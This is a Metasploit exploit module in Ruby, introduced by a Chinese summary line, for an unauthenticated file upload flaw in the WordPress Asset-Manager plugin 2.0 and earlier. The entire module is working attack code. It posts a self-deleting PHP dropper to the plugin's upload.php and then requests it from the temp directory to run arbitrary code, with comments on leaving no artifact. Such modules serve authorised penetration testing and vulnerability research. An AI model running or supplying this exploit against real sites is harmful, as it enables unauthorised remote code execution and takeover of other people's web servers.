这是一个 Metasploit 模块，利用 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞：该插件的 upload.php 允许未经身份验证的用户向临时目录上传任意文件（包括 PHP 文件），从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
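# Framework core plus the PhpEXE mixin that builds the self-unlinking PHP dropper.
require 'msf/core'
require 'msf/core/exploit/php_exe'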
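# Unauthenticated arbitrary file upload in the WordPress Asset-Manager plugin
# (<= 2.0). upload.php stores whatever is posted as "Filedata" under
# wp-content/uploads/assets/temp/ without checking the caller's session or
# the file type, so a .php dropper can be uploaded and then requested directly.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Module metadata. The interface (name, options, targets) is kept as-is so
  # existing resource scripts keep working.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Upload the PHP dropper through upload.php, then trigger it with a GET to
  # the plugin's temp directory. Raises via fail_with when the upload is not
  # acknowledged or the trigger request returns a non-200 status.
  def exploit
    # Build the base path with `+=` so the String owned by target_uri is not
    # mutated in place (the original `<<` appended to it).
    uri = target_uri.path
    uri += '/' unless uri.end_with?('/')
    peer = "#{rhost}:#{rport}"

    # Random alpha name; it is both the upload's filename and the path we fetch.
    payload_name = "#{rand_text_alpha(5)}.php"
    temp_path    = "#{uri}wp-content/uploads/assets/temp/#{payload_name}"

    # :unlink_self makes the dropped script delete itself when it runs, so a
    # successful run leaves no artifact. If execution never happens the file
    # stays on the target (see the failure branch below).
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Work around a Rex::MIME quirk: drop a leading CRLF before the first
    # boundary so the body begins with the boundary marker (presumably what
    # upload.php's parser expects; kept from the original module).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The module relies on upload.php echoing the stored filename; a missing
    # reply, a non-200 status, or a body without our name all count as failure.
    # Plain substring match instead of a regex: the "." in ".php" would
    # otherwise be a wildcard.
    unless res && res.code == 200 && res.body.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => temp_path,
      'method' => 'GET'
    })

    # A nil response is deliberately tolerated: a reverse/staged payload may
    # never send an HTTP reply. Only an explicit non-200 status is treated as
    # failure. In that case the dropper is still on disk (unlink_self only
    # fires when it executes), so tell the operator where to clean up.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed (uploaded file may remain at #{temp_path})")
    end
  end
end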